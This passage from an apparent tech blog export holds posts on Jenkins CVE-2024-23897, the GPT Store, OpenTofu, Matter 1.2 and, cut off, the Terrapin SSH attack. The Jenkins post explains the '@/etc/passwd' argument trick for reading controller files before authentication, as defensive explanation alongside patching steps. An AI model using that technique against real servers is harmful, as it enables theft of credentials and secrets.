The 2D window mode is trivial to adopt, and it\u0026rsquo;ll give you a feel for the platform\u0026rsquo;s potential. If you\u0026rsquo;re a web developer, explore WebXR — it\u0026rsquo;s your most efficient path to spatial computing. And if you\u0026rsquo;re in an enterprise context where spatial visualization adds real value, start prototyping now while the competition is still figuring things out.\nSpatial computing isn\u0026rsquo;t going to replace our flat screens anytime soon. But it\u0026rsquo;s going to become another surface we build for, and the developers who understand it early will have a meaningful advantage.\n","date":"1 February 2024","externalUrl":null,"permalink":"/posts/240201-apple-vision-pro-spatial-computing-dev/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple Vision Pro launches tomorrow and the developer ecosystem is already forming. Here’s what spatial computing means for the rest of us who build software.","title":"Apple Vision Pro Arrives — A Developer's First Impressions of Spatial Computing","type":"posts"},{"content":"If you run Jenkins — and statistically, there\u0026rsquo;s a decent chance you do — you need to pay attention to CVE-2024-23897. Disclosed this week by the Jenkins security team, this is a critical vulnerability in the Jenkins CLI that allows unauthenticated attackers to read arbitrary files on the Jenkins controller\u0026rsquo;s file system. Under certain configurations, it can lead to remote code execution.\nThe vulnerability has a CVSS score of 9.8, and proof-of-concept exploits are already circulating. If your Jenkins instance is exposed to the internet — even behind a VPN — patch now, read this later.\nThe Technical Details # The vulnerability lives in Jenkins\u0026rsquo; built-in CLI, which uses the args4j library to parse command arguments. 
Here\u0026rsquo;s the clever part: args4j has a feature where any argument starting with @ is interpreted as a file path, and the file\u0026rsquo;s contents are expanded as arguments. This is meant to be a convenience feature for passing arguments via files.\nThe problem is that this expansion happens before authentication and authorization checks. An attacker can send a CLI command with @/etc/passwd (or any other file path) and the file\u0026rsquo;s contents will be included in error messages or response data, effectively leaking the file to the attacker.\nThe impact varies depending on your Jenkins configuration:\nWith \u0026ldquo;Allow anonymous read access\u0026rdquo; enabled: Attackers can read entire files. This is the worst case and it\u0026rsquo;s game over — they can grab credentials, private keys, and secrets stored on the controller. Without anonymous read access: Attackers can still read the first few lines of files, which is often enough to extract binary secrets like cryptographic keys. With specific plugins: Certain configurations enable full remote code execution through this vector. What makes this particularly nasty is that the Jenkins CLI is enabled by default. Unless you\u0026rsquo;ve explicitly disabled it, your instance is potentially vulnerable. This is particularly critical given Jenkins\u0026rsquo; role in software supply chain security.\nWhy Jenkins Keeps Getting Hit # This isn\u0026rsquo;t Jenkins\u0026rsquo; first critical vulnerability, and it won\u0026rsquo;t be the last. The tool occupies an uncomfortable position in the DevOps ecosystem: it\u0026rsquo;s incredibly widely deployed, it\u0026rsquo;s often running with elevated privileges, and many installations are maintained with a \u0026ldquo;set it and forget it\u0026rdquo; mentality. 
Jenkins and related CI/CD tools have been frequent targets in supply chain attacks.\nIn my experience, Jenkins instances tend to accumulate technical debt faster than almost any other piece of infrastructure. They start as simple build servers, then get plugins added, then pipelines get complex, then nobody wants to touch them because everything might break. The result is Jenkins servers running outdated versions with a graveyard of unused plugins, each one a potential attack surface.\nThe CI/CD server is also one of the most valuable targets in any organization. It typically has access to source code repositories, deployment credentials, cloud provider keys, and production infrastructure. Compromise a Jenkins server and you\u0026rsquo;ve often compromised the entire software delivery pipeline, as we\u0026rsquo;ve seen in multiple supply chain incidents.\nImmediate Remediation Steps # Here\u0026rsquo;s what you should do right now, in order of priority:\n1. Patch immediately. Jenkins 2.442 and LTS 2.426.3 fix the vulnerability. If you can\u0026rsquo;t patch immediately, disable the CLI by setting the Java system property jenkins.CLI.disabled=true or by removing the CLI endpoint entirely.\n2. Audit your exposure. Check whether your Jenkins instance is reachable from the internet. You\u0026rsquo;d be surprised how many \u0026ldquo;internal\u0026rdquo; Jenkins servers end up exposed through misconfigured load balancers or VPN split-tunnel configurations. Internet exposure of internal infrastructure is a common source of compromise, similar to the Microsoft Exchange attacks we\u0026rsquo;ve seen.\n3. Rotate secrets. If your Jenkins controller has been exposed, assume the worst. Rotate all credentials stored in Jenkins — SSH keys, API tokens, cloud provider credentials, everything. Yes, this is painful. Do it anyway.\n4. Review your plugin inventory. While you\u0026rsquo;re at it, audit your installed plugins. Remove anything you\u0026rsquo;re not actively using. 
Each plugin is additional attack surface, and many haven\u0026rsquo;t been updated in years.\n5. Check your authentication model. If you had anonymous read access enabled, you were fully exposed. Disable it and implement proper RBAC. Consider integrating with your organization\u0026rsquo;s SSO/LDAP rather than managing Jenkins users independently.\nThe Bigger Conversation: CI/CD Security Posture # This vulnerability is a symptom of a broader problem: we\u0026rsquo;ve collectively underinvested in CI/CD security. We lock down production environments with network policies, runtime security, and elaborate access controls, but the build server that has the keys to deploy to all those environments often sits in a dusty corner of the infrastructure with default settings.\nI\u0026rsquo;ve been doing security reviews for teams moving to modern CI/CD platforms, and the Jenkins migrations invariably uncover horror shows: build scripts with hardcoded credentials, shared service accounts with admin privileges, plugins that haven\u0026rsquo;t been updated in three years, and backup scripts that dump everything including secrets to unencrypted storage.\nIf this vulnerability is a wake-up call for your organization, let it be a productive one. Don\u0026rsquo;t just patch and move on. Take the time to review your CI/CD security posture holistically. Map out what credentials your build system has access to, implement least-privilege access, enable audit logging, and consider whether it\u0026rsquo;s time to move to a more modern, security-focused CI/CD platform.\nMy Take # I\u0026rsquo;ve run Jenkins for longer than I\u0026rsquo;d sometimes like to admit. It\u0026rsquo;s a workhorse, and for all its warts, it\u0026rsquo;s incredibly flexible. 
But CVE-2024-23897 is a reminder that flexibility often comes at the cost of security, especially when the defaults are permissive.\nIf you\u0026rsquo;re still running Jenkins, patch immediately and use this as an opportunity to harden your setup. If you\u0026rsquo;ve been considering a migration to GitHub Actions, GitLab CI, or another platform, this might be the push you need to make the business case.\nThe CI/CD pipeline is the crown jewels of your development infrastructure. It deserves the same security attention you give to production. No less.\n","date":"25 January 2024","externalUrl":null,"permalink":"/posts/240125-jenkins-cve-2024-23897-cicd-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical Jenkins vulnerability allows arbitrary file reads through the CLI. Here’s why this matters more than your typical CVE and what it reveals about CI/CD security.","title":"Jenkins Under Fire — CVE-2024-23897 and the Cost of Legacy Infrastructure","type":"posts"},{"content":"Last week, OpenAI finally launched the GPT Store, and with it, the company is making its most significant platform play yet. After teasing custom GPTs at DevDay back in November, the store is now live for ChatGPT Plus, Team, and Enterprise subscribers. It\u0026rsquo;s essentially an app store for AI agents — and if that comparison makes you think of both the promise and the pitfalls of Apple\u0026rsquo;s App Store circa 2008, you\u0026rsquo;re not alone.\nI spent the past week poking around the store, building a couple of custom GPTs myself, and talking to other developers doing the same. Here\u0026rsquo;s my assessment of where things stand and where they might be heading.\nWhat the GPT Store Actually Is # At its core, the GPT Store is a marketplace where anyone with a ChatGPT Plus subscription can publish custom GPTs — specialized versions of ChatGPT configured with specific instructions, knowledge files, and capabilities. 
These aren\u0026rsquo;t fine-tuned models; they\u0026rsquo;re more like sophisticated prompt wrappers with persistent configuration and optional API integrations through what OpenAI calls \u0026ldquo;Actions.\u0026rdquo;\nThe store is organized into categories: DALL·E, Writing, Research, Programming, Education, and Lifestyle. There\u0026rsquo;s a search function, trending lists, and featured picks curated by OpenAI. The initial catalog already has over three million custom GPTs, which tells you both that the barrier to creation is low and that discovery is going to be a massive challenge.\nBuilding a custom GPT takes minutes if you\u0026rsquo;re doing something simple — you\u0026rsquo;re essentially having a conversation with GPT-4 about what you want the bot to do, uploading any reference documents, and optionally connecting external APIs. It\u0026rsquo;s impressively accessible for non-developers, which is both the point and the concern.\nThe Developer Angle: Actions and API Integration # Where things get interesting for us as developers is the Actions framework. Actions let your custom GPT call external APIs using OpenAPI specifications. You define the endpoints, the authentication method, and the schema, and GPT-4 figures out when and how to call them based on the conversation context.\nI built a GPT that integrates with our internal documentation API — essentially a conversational interface over our engineering wiki. The setup was straightforward: export the OpenAPI spec, configure OAuth, and let the GPT handle the rest. It works surprisingly well for lookup-style queries, though it struggles with multi-step workflows that require maintaining state across several API calls, which is an inherent challenge in LLM applications.\nThe real potential here is in vertical applications. A GPT that can query your monitoring stack, cross-reference with your incident database, and suggest runbook steps — that\u0026rsquo;s genuinely useful. 
But we\u0026rsquo;re a long way from reliable implementations of that vision. The context window limitations, the occasional hallucination about API parameters, and the lack of proper error handling make current Actions feel more like prototypes than products.\nThe Economics: Revenue Sharing Is Coming # OpenAI has announced a revenue-sharing program for GPT creators, set to launch in Q1 2024. Details are sparse — they\u0026rsquo;ve mentioned it\u0026rsquo;ll be based on \u0026ldquo;user engagement\u0026rdquo; — but this is clearly the carrot designed to attract serious developers to the platform.\nI\u0026rsquo;m skeptical about the economics for individual creators. If the App Store taught us anything, it\u0026rsquo;s that these marketplaces tend toward a winner-take-all dynamic. The top 1% of GPTs will capture the vast majority of engagement, and with three million entries already, standing out is a needle-in-a-haystack problem.\nThe more interesting economic play is for companies that use custom GPTs as a distribution channel for their existing services. If you\u0026rsquo;re a SaaS company, wrapping your API in a conversational GPT interface is essentially a new customer acquisition channel — one that lives inside ChatGPT\u0026rsquo;s massive user base.\nThe Platform Risk Discussion # Let\u0026rsquo;s talk about the elephant in the room: platform dependency. Building on OpenAI\u0026rsquo;s platform means accepting that they control the rules, the distribution, and the underlying model. They can change the Terms of Service, adjust the ranking algorithm, or deprecate features at will.\nWe\u0026rsquo;ve seen this movie before. Facebook\u0026rsquo;s app platform, Twitter\u0026rsquo;s API ecosystem, Slack\u0026rsquo;s app directory — all went through cycles of openness followed by constraint. 
I\u0026rsquo;m not saying OpenAI will follow the same path, but any developer building a business on the GPT Store should have a clear-eyed view of the risks.\nThe smart play, as always, is to treat the GPT Store as a channel, not a foundation. Build your core logic in your own stack, expose it via APIs, and use the GPT Store as one of several interfaces. If the platform changes, you\u0026rsquo;ve lost a distribution channel, not your entire product.\nWhat\u0026rsquo;s Missing # A few things I noticed that are conspicuously absent:\nAnalytics: There\u0026rsquo;s no dashboard for GPT creators to understand usage patterns, user retention, or conversation quality. You\u0026rsquo;re publishing into a void.\nVersion control: There\u0026rsquo;s no proper versioning system for GPTs. You can edit your GPT, but there\u0026rsquo;s no way to roll back, maintain multiple versions, or do staged rollouts.\nTeam collaboration: Building GPTs is currently a solo activity. There\u0026rsquo;s no way for a team to co-manage a GPT, which limits its usefulness for corporate deployments.\nTesting frameworks: There\u0026rsquo;s no way to systematically test your GPT\u0026rsquo;s responses before publishing. Given that these are customer-facing products, the lack of QA tooling is a significant gap.\nMy Take # The GPT Store is an important moment in AI development, but not because of what it is today. It\u0026rsquo;s important because it signals OpenAI\u0026rsquo;s strategic direction: they want to be the platform, not just the model provider. The store is their bid to create an ecosystem lock-in that goes beyond API access.\nFor developers, the immediate value is modest. Custom GPTs are useful for internal tools and quick prototypes, but the lack of proper development tooling makes them hard to take seriously for production applications.\nThe real question is whether OpenAI will invest in the developer experience. 
If they add proper analytics, testing frameworks, and team features, the GPT Store could become a meaningful platform. If they don\u0026rsquo;t, it\u0026rsquo;ll be another app store full of novelty bots that nobody uses after the first week.\nI\u0026rsquo;ll be watching the revenue-sharing details closely. That\u0026rsquo;ll tell us more about OpenAI\u0026rsquo;s commitment to the ecosystem than any number of blog posts.\n","date":"18 January 2024","externalUrl":null,"permalink":"/posts/240118-gpt-store-launch-ai-development/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches the GPT Store, creating a marketplace for custom GPTs. Here’s what it means for developers and why the platform play matters more than the individual bots.","title":"The GPT Store Is Live — What It Means for AI Development","type":"posts"},{"content":"It\u0026rsquo;s only been about four months since the OpenTofu project was announced as a direct response to HashiCorp\u0026rsquo;s controversial switch of Terraform to the Business Source License (BSL). Now, with the release of OpenTofu 1.6, we have a production-ready, generally available fork that\u0026rsquo;s positioning itself as the community\u0026rsquo;s answer to a fundamental question: who owns infrastructure-as-code? Just a week earlier, the project had announced its first stable release, establishing itself as a credible alternative to HashiCorp\u0026rsquo;s direction.\nI\u0026rsquo;ve been watching this unfold with a mixture of cautious optimism and professional concern. After all, when you\u0026rsquo;ve spent years building pipelines and modules around a tool, a licensing change isn\u0026rsquo;t just corporate politics — it\u0026rsquo;s a direct threat to your workflow.\nWhat OpenTofu 1.6 Actually Delivers # Let\u0026rsquo;s cut through the narrative and look at what shipped. 
OpenTofu 1.6 is essentially a drop-in replacement for Terraform 1.6, which is exactly what the community needed as a starting point. The project maintains full compatibility with existing Terraform state files, modules, and providers. If you have a terraform binary in your CI pipeline, swapping it for tofu should be largely seamless.\nThe release includes the usual suspects: support for testing with tofu test and S3 state backend improvements, both carried over from the Terraform 1.6 line, plus OpenTofu\u0026rsquo;s own provider and module registry. But the real story isn\u0026rsquo;t about features — it\u0026rsquo;s about governance and momentum.\nThe project is now under the Linux Foundation, backed by companies like Spacelift, env0, Scalr, and Gruntwork. That\u0026rsquo;s not just moral support; these are companies that have built their businesses around Terraform workflows and have a material interest in keeping the ecosystem open.\nThe BSL Question Isn\u0026rsquo;t Going Away # HashiCorp\u0026rsquo;s move to BSL last August sent shockwaves through the infrastructure community, and rightly so. The BSL essentially means you can use Terraform freely unless you\u0026rsquo;re offering a competing service — but the definition of \u0026ldquo;competing\u0026rdquo; is vague enough to make legal departments nervous.\nI\u0026rsquo;ve talked to several teams at mid-size companies who are genuinely unsure whether their internal platform engineering setups could be considered \u0026ldquo;competitive\u0026rdquo; under the BSL. When your infrastructure tooling requires a legal opinion to deploy, something has gone wrong.\nThis isn\u0026rsquo;t unique to HashiCorp, of course. We saw similar concerns with Redis, MongoDB, and Elastic changing their licenses. But Terraform occupies such a foundational position in modern infrastructure that the impact is amplified. 
It\u0026rsquo;s the kind of tool that becomes invisible — you don\u0026rsquo;t think about it until it breaks or, in this case, until someone changes the rules.\nWhat This Means for Your Existing Pipelines # If you\u0026rsquo;re running Terraform today, you don\u0026rsquo;t need to panic. HashiCorp hasn\u0026rsquo;t changed the license retroactively (they can\u0026rsquo;t), and for most teams doing internal infrastructure work, the BSL doesn\u0026rsquo;t apply. But if you\u0026rsquo;re planning ahead — and you should be — here\u0026rsquo;s my practical take:\nFor internal teams: Keep an eye on OpenTofu but don\u0026rsquo;t rush to migrate. The 1.6 release is solid, but the real test comes with 1.7 and beyond, when the projects start to diverge. You want to see that OpenTofu can innovate independently, not just track HashiCorp\u0026rsquo;s releases.\nFor platform teams building internal tools: This is where it gets murky. If you\u0026rsquo;re building an internal developer platform that wraps Terraform, you should at least evaluate OpenTofu as a risk mitigation strategy. Having a migration plan doesn\u0026rsquo;t mean you have to execute it.\nFor vendors and consultancies: If you offer Terraform-related services, you need a clear understanding of where you stand with the BSL. OpenTofu gives you an unambiguous fallback.\nThe state file compatibility is crucial here. It means you can experiment with OpenTofu in a staging environment without committing to anything. Just point it at your existing state and see what happens. In my testing, the migration is as boring as it should be — which is exactly the kind of boring I like in infrastructure tooling.\nThe Bigger Picture: Open Source Sustainability # What I find most interesting about the OpenTofu story isn\u0026rsquo;t the technical details — it\u0026rsquo;s what it says about the state of open-source business models. 
HashiCorp built an incredible company on open-source tools, went public, and then decided the open-source model wasn\u0026rsquo;t working for them. You can argue about whether they were right to do that, but you can\u0026rsquo;t deny they\u0026rsquo;ve created a template that makes other companies nervous. We\u0026rsquo;ve seen similar tensions arise in other open-source projects, where the economics of sustainability and community expectations collide.\nEvery time I adopt a new open-source tool now, I find myself asking: what\u0026rsquo;s the exit strategy if the license changes? That\u0026rsquo;s a sad question to have to ask, but it\u0026rsquo;s a pragmatic one.\nOpenTofu represents one answer: if you build a big enough community around a tool, the community can sustain it independently. But that only works when enough companies step up with real resources — developers, infrastructure, money. The Linux Foundation backing helps, but the proof will be in whether OpenTofu can attract and retain contributors over the next year.\nMy Take # I\u0026rsquo;m cautiously bullish on OpenTofu. The 1.6 release is exactly what it needed to be: boring, compatible, and stable. The governance structure is sound, and the backing companies have real skin in the game.\nBut I\u0026rsquo;ve also been around long enough to see forks fizzle out. The initial energy is always high — it\u0026rsquo;s sustaining that energy through the unglamorous work of bug fixes, security patches, and documentation that separates viable projects from abandoned ones.\nFor now, I\u0026rsquo;m running OpenTofu in my personal projects and keeping Terraform in production at work. I\u0026rsquo;ll revisit that decision when OpenTofu 1.7 lands and we can see whether the project is charting its own course or just playing catch-up.\nThe infrastructure-as-code space is healthier for having this competition. 
Whatever happens with OpenTofu specifically, the message to every open-source steward is clear: your community is an asset, not a liability. Treat it accordingly.\n","date":"11 January 2024","externalUrl":null,"permalink":"/posts/240111-opentofu-1-6-terraform-fork-grows-up/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenTofu hits its first GA release, proving that the open-source fork of Terraform is more than a protest — it’s a viable alternative.","title":"OpenTofu 1.6 GA — The Terraform Fork Grows Up","type":"posts"},{"content":"Happy new year. While most of the tech world was recovering from the holidays, the OpenTofu project has been quietly building momentum toward its first stable release. For those who missed the drama: last August, HashiCorp switched Terraform from the Mozilla Public License (MPL 2.0) to the Business Source License (BSL 1.1), effectively making it non-open-source. The community\u0026rsquo;s response was swift and decisive — OpenTofu, a truly open-source fork of Terraform, is now under the Linux Foundation\u0026rsquo;s stewardship and approaching general availability. This follows a long history of infrastructure-as-code evolution where practitioners have depended on open tooling for critical operational work.\nHow We Got Here # HashiCorp\u0026rsquo;s license change in August 2023 sent shockwaves through the infrastructure-as-code community. Terraform had been the de facto standard for cloud provisioning for nearly a decade, and much of its dominance was built on the trust that comes with genuine open-source licensing. The BSL 1.1 license restricts competitive use — meaning companies that offer products competing with HashiCorp\u0026rsquo;s commercial offerings can no longer freely use the Terraform codebase.\nThe response was remarkably organized. Within days, a manifesto appeared with signatures from major Terraform ecosystem players including Gruntwork, Spacelift, Env0, and Scalr. 
By September, the fork was official and had been accepted into the Linux Foundation. The speed of this mobilization tells you something about how deeply the community values genuine open-source licensing for infrastructure tooling.\nI\u0026rsquo;ve been through enough open-source licensing disputes to know that forks often start with energy and fizzle out. But OpenTofu has several things working in its favor: corporate backing from companies whose businesses depend on an open Terraform ecosystem, Linux Foundation governance providing neutrality, and a codebase that was already well-understood by hundreds of contributors.\nWhat OpenTofu Brings # At its core, OpenTofu is a drop-in replacement for Terraform. The initial releases have focused on maintaining compatibility — if you have existing Terraform configurations, the migration path is designed to be as simple as changing the binary you run. Same HCL syntax, same provider ecosystem, same state file format.\nBut the project isn\u0026rsquo;t just about maintaining the status quo. The roadmap includes features the community has long requested, with state encryption being one of the most anticipated. Terraform state files can contain sensitive information — database passwords, API keys, private IPs — and they\u0026rsquo;ve historically been stored unencrypted. State encryption in OpenTofu would address a security gap that the community has been asking HashiCorp to fix for years.\nThe provider registry is another area where OpenTofu is establishing independence. While maintaining compatibility with existing Terraform providers, the project is building its own registry infrastructure to ensure it isn\u0026rsquo;t dependent on HashiCorp\u0026rsquo;s services. This is crucial for long-term viability — you can\u0026rsquo;t claim independence if your tool still phones home to the company you forked from.\nThe Broader License Debate # The HashiCorp situation isn\u0026rsquo;t isolated. 
We\u0026rsquo;ve seen similar license changes from MongoDB (SSPL), Elastic (SSPL, then a partial reversal), Redis (Commons Clause, then RSAL), and Confluent (Community License). The pattern is clear: companies that built businesses on open-source software are feeling pressure from cloud providers offering their tools as managed services, and they\u0026rsquo;re responding by restricting their licenses.\nI understand the business pressure. Building and maintaining complex infrastructure software is expensive, and watching AWS or Azure offer a managed version of your product without contributing proportionally back is genuinely frustrating. But the solution of changing licenses after building a community on open-source trust feels like a betrayal, and the market is responding accordingly.\nThe interesting question is whether OpenTofu can maintain momentum long-term. Forks succeed when they attract a sustainable contributor community and when the ecosystem (in this case, providers and modules) supports them. The early signs are positive — major Terraform providers are compatible, and the companies backing OpenTofu have direct business incentives to keep contributing.\nPractical Implications # If you\u0026rsquo;re running Terraform in production today, here\u0026rsquo;s my practical take:\nDon\u0026rsquo;t panic. The BSL license doesn\u0026rsquo;t affect most users. If you\u0026rsquo;re using Terraform to manage your own infrastructure, nothing changes for you legally. The restrictions apply to companies building competitive products.\nStart evaluating OpenTofu. Even if the license change doesn\u0026rsquo;t affect you directly, there\u0026rsquo;s value in having a fully open-source option. Set up a parallel pipeline with OpenTofu and verify your configurations work. The migration cost today is minimal.\nWatch the provider ecosystem. The critical dependency for any Terraform-like tool is provider support. Monitor how providers handle dual compatibility. 
Most major providers (AWS, Azure, GCP, Kubernetes) use the Terraform Plugin SDK, which OpenTofu supports.\nConsider your CI/CD pipeline. If you\u0026rsquo;re using Terraform Cloud or Terraform Enterprise, the switch to OpenTofu would also mean changing your orchestration layer. Tools like Spacelift, Env0, and Atlantis already support or are adding OpenTofu support.\nMy Take # I\u0026rsquo;ve been using Terraform since version 0.6, and I\u0026rsquo;ve watched it grow from a promising tool into the backbone of infrastructure automation at thousands of organizations. The license change genuinely disappointed me — not because I don\u0026rsquo;t understand HashiCorp\u0026rsquo;s business pressures, but because it undermined the trust relationship between the project and its community. The broader open-source ecosystem has faced similar tensions between maintainer sustainability and community trust, and these patterns are interconnected.\nOpenTofu represents something important beyond just a Terraform alternative. It\u0026rsquo;s a test case for whether the open-source community can effectively fork and sustain a complex infrastructure tool when the original maintainer changes direction. If OpenTofu succeeds, it sends a clear signal to other companies considering similar license changes: the community will route around restrictions, and you might end up competing with a well-funded fork of your own software.\nAs we start 2024, I\u0026rsquo;m cautiously optimistic about OpenTofu\u0026rsquo;s trajectory. The governance model is sound, the backing is substantial, and the technical foundation is solid. 
Whether it can attract enough independent contributors to innovate beyond what Terraform offers is the question that will determine if this is a footnote or a turning point for infrastructure as code.\n","date":"4 January 2024","externalUrl":null,"permalink":"/posts/240104-opentofu-open-source-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As OpenTofu approaches its first stable release, the HashiCorp license change continues to reshape how we think about open source infrastructure tooling.","title":"OpenTofu and the Future of Open Source Infrastructure","type":"posts"},{"content":"As 2023 wraps up, it\u0026rsquo;s worth taking stock of one of the more quietly significant developments in the tech world: the Matter protocol reaching version 1.2, expanding its device type support and slowly (very slowly) delivering on the promise of smart home interoperability. Having lived through every failed IoT standardization attempt of the past fifteen years, I\u0026rsquo;m cautiously optimistic for the first time in a while.\nWhere We Are # Matter 1.2, released by the Connectivity Standards Alliance (CSA) in October, added support for nine new device types: refrigerators, room air conditioners, dishwashers, laundry washers, robotic vacuum cleaners, smoke and CO alarms, air quality sensors, air purifiers, and fans. This brings the total supported device categories to a point where Matter starts to look like a genuinely comprehensive smart home protocol rather than a proof of concept limited to lights and switches.\nThe original Matter 1.0 specification, released in late 2022, supported a relatively narrow set of devices: lighting, HVAC controls, door locks, blinds, media devices, and a few others. It was enough to demonstrate the concept but not enough to build a complete smart home ecosystem around. 
Version 1.1 added refinements, and now 1.2 significantly broadens the scope.\nMore importantly, the major ecosystem players continue to participate. Apple HomeKit, Google Home, Amazon Alexa, and Samsung SmartThings all support Matter devices. When was the last time Apple, Google, Amazon, and Samsung agreed on anything? That alone tells you this standard has legs.\nWhy It Matters for Developers # For those of us building IoT applications or integrating smart devices into larger systems, Matter addresses the fundamental pain point: every manufacturer\u0026rsquo;s proprietary protocol requiring its own integration, its own cloud service, its own authentication flow, and its own failure modes.\nMatter runs over Thread (for low-power mesh networking) and Wi-Fi (for higher-bandwidth devices), with Bluetooth Low Energy used for commissioning. The protocol itself uses IPv6 natively, which means Matter devices are real network citizens rather than opaque bridges sitting behind manufacturer-specific hubs.\nFrom an architecture perspective, this is transformative. Instead of building integrations against dozens of proprietary APIs — each with their own rate limits, authentication quirks, and deprecation timelines — you can target a single, well-documented protocol. The Matter SDK is open source and actively maintained, which lowers the barrier for both device manufacturers and application developers.\nThe local-first nature of Matter also matters enormously. Devices communicate locally within the home network rather than routing through cloud services. This means better latency, continued operation during internet outages, and significantly better privacy characteristics. After years of IoT devices phoning home to servers in jurisdictions with questionable data protection, local control is a welcome default.\nThe Challenges That Remain # Let\u0026rsquo;s not pretend this is a solved problem. Matter adoption is still slower than the industry hoped. 
Device manufacturers are cautious about the certification costs and engineering effort required. Many have released Matter-compatible firmware updates for existing devices, but the experience can be hit-or-miss.\nThe Thread border router situation is particularly fragmented. You need a Thread border router to communicate with Thread-based Matter devices, and while Apple TV 4K, HomePod Mini, and some Google Nest devices serve as border routers, the setup isn\u0026rsquo;t always intuitive. I\u0026rsquo;ve spent more time than I\u0026rsquo;d like debugging Thread network formation issues across different border routers.\nThere\u0026rsquo;s also the \u0026ldquo;Matter bridge\u0026rdquo; pattern, where manufacturers expose their existing proprietary devices through a Matter bridge. This gets devices into the Matter ecosystem but doesn\u0026rsquo;t deliver the full local-control promise — you still depend on the manufacturer\u0026rsquo;s hub and potentially their cloud service. It\u0026rsquo;s a pragmatic transition approach, but it muddies the value proposition.\nAnd then there\u0026rsquo;s the feature gap. Matter\u0026rsquo;s device models define a common set of capabilities, but many devices have manufacturer-specific features that don\u0026rsquo;t map cleanly to the standard attributes. Your fancy robot vacuum might show up as a basic on/off device in Matter, with all the advanced mapping and scheduling features only available through the manufacturer\u0026rsquo;s own app.\nThe Home Assistant Factor # I\u0026rsquo;d be remiss not to mention Home Assistant, which has become the de facto hub for anyone serious about home automation. 
Home Assistant\u0026rsquo;s Matter support has been improving steadily, and the combination of Matter for device communication with Home Assistant for automation and intelligence is looking increasingly compelling.\nWhat Home Assistant demonstrates is that there\u0026rsquo;s enormous demand for a unified control layer, and Matter provides the device communication substrate that makes this viable without requiring hundreds of custom integrations. The open-source community around home automation has been solving this problem from the top down (integration layer) while Matter solves it from the bottom up (protocol layer). The convergence of these approaches is where IoT finally starts to deliver on its decade-old promises.\nMy Take # I\u0026rsquo;ve been building and tinkering with IoT systems since before the term existed — back when we just called it \u0026ldquo;embedded systems with network connectivity.\u0026rdquo; Every few years, a new standard promises to unify the ecosystem, and every few years, the industry fragments further. Zigbee, Z-Wave, HomeKit, various Thread implementations — my home lab has collected protocols like others collect vintage wine.\nMatter feels different, primarily because of the breadth of industry support. When Apple and Google both commit engineering resources to the same protocol, the gravitational pull is hard for smaller players to resist. Version 1.2\u0026rsquo;s expanded device support shows momentum, not stagnation.\nIs Matter perfect? Absolutely not. The commissioning experience needs work, Thread networking can be finicky, and the feature gap for advanced device capabilities is real. But for the first time in the IoT space, we have a standard that major players are actively investing in, that runs locally, that\u0026rsquo;s built on IP, and that\u0026rsquo;s open enough for the community to build on. As we head into 2024, I\u0026rsquo;m cautiously optimistic that the IoT interoperability dream might actually be within reach. 
Cautiously.\n","date":"28 December 2023","externalUrl":null,"permalink":"/posts/231228-matter-protocol-iot-standardization/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Matter protocol reaches version 1.2, expanding device support and inching closer to the interoperability promise that IoT has needed for years.","title":"Matter 1.2 and the Slow March Toward IoT Sanity","type":"posts"},{"content":"Just in time for the holidays, security researchers from Ruhr University Bochum have published details on Terrapin (CVE-2023-48795), a novel attack against the SSH protocol that affects virtually every SSH implementation in existence. When I first read the paper, my reaction was a mix of admiration for the research and that familiar sinking feeling you get when a protocol you\u0026rsquo;ve trusted implicitly for decades turns out to have a subtle flaw.\nWhat Is Terrapin? # Terrapin is a prefix truncation attack that targets the SSH handshake. By manipulating sequence numbers during the initial key exchange, an attacker performing a man-in-the-middle can effectively delete messages from the beginning of the encrypted channel without either side detecting the manipulation. The attack exploits the way SSH handles sequence numbers in combination with certain encryption modes.\nThe critical insight is that during the handshake, before the encrypted channel is fully established, there\u0026rsquo;s a window where an active attacker can inject and delete packets. By carefully truncating specific messages, the attacker can downgrade the security of the connection — for example, disabling keystroke timing obfuscation in OpenSSH or forcing a fallback to weaker authentication mechanisms.\nTo be clear: this isn\u0026rsquo;t a \u0026ldquo;decrypt all your SSH traffic\u0026rdquo; attack. It requires an active man-in-the-middle position, and its impact varies depending on the specific SSH implementation and configuration. 
But the fact that it works at the protocol level, not due to an implementation bug, means every SSH client and server is potentially affected.\nThe Technical Details # The attack specifically targets encryption modes that use the encrypt-then-MAC approach or the ChaCha20-Poly1305 cipher. These are, ironically, some of the more modern and generally recommended cipher configurations. According to the researchers, AES-GCM and the older encrypt-and-MAC modes are not vulnerable.\nWhat makes this particularly clever is the exploitation of SSH\u0026rsquo;s Binary Packet Protocol. SSH assigns sequence numbers to packets, but these sequence numbers aren\u0026rsquo;t cryptographically protected during the handshake transition. The attacker can inject a carefully crafted SSH_MSG_IGNORE message during the unencrypted part of the handshake, which increments the receive sequence counter of the peer that gets it. That offset then lets the attacker delete the same number of messages from the beginning of the encrypted stream, after which both counters line up again and neither side notices.\nThe researchers found that roughly 77% of SSH servers on the internet support a vulnerable encryption mode, making this a widespread concern even if the practical exploitability has significant constraints.\nImpact Assessment # Let\u0026rsquo;s be practical about severity. The Terrapin attack requires:\nAn active man-in-the-middle position on the network.\nA connection that uses a vulnerable cipher suite.\nEven then, the actual impact depends on what those truncated initial messages contained.\nFor most SSH usage (connecting to servers, running remote commands, transferring files) the practical impact is limited. The attacker can\u0026rsquo;t read or modify the content of your session. 
